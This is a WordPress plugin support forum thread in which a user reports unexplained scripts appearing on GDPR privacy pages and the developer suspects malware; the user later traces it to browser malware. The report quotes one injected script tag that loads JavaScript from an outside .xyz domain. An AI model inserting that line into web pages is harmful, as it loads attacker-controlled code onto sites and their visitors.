Thanks so much for developing the GDPR WordPress Framework plugin. It’s easy to use and seems to be the best of the available options.

I’ve been installing it on several sites this week but have noticed that extra potentially unwanted bits of code – scripts – are appearing at the bottom of the auto-generated Privacy Policy page. I noticed them in ‘text’ mode and deleted them, but they often return. They also sometimes appear on the Privacy Tools page as well.

This issue could be unrelated to your code, but it seems to consistently happen on every site where I’ve installed The GDPR Framework and your Gravity Forms plugins and not on other sites.

Any thoughts on why this may be happening? Here’s a sample of what the extra code looks like: <script src=”https://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52131x6966x&r=28&#8243; type=”text/javascript”></script>

    Thanks again,
    Jacob

  • Hi there!

This definitely looks like something created by malware. Do you have any security plugins on those sites? If not, do you mind installing something, for example WordFence, and running some scans?

How long ago did you install the GDPR framework on those sites?

Indrek – Thanks for your quick reply. It looks like this was a type of malware that operated through Chrome, not my Mac… The issue started happening on other sites as well before I installed your plugin. Thanks again for your work in putting together The GDPR Framework!

    Thanks for letting me know!
